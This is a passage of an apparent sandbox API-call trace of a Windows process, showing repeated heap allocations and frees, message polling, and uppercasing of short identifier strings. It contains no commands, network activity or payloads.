hHeap=0x25c0000) returned 1 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x168c3) returned 0x34c8b20 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.584] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.585] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.585] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.585] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.589] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.589] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.590] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.590] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.590] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.590] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.590] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.591] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.591] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.591] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.592] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.592] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.592] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.592] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.592] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.593] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.593] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.594] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.594] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.594] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.595] PeekMessageW (in: 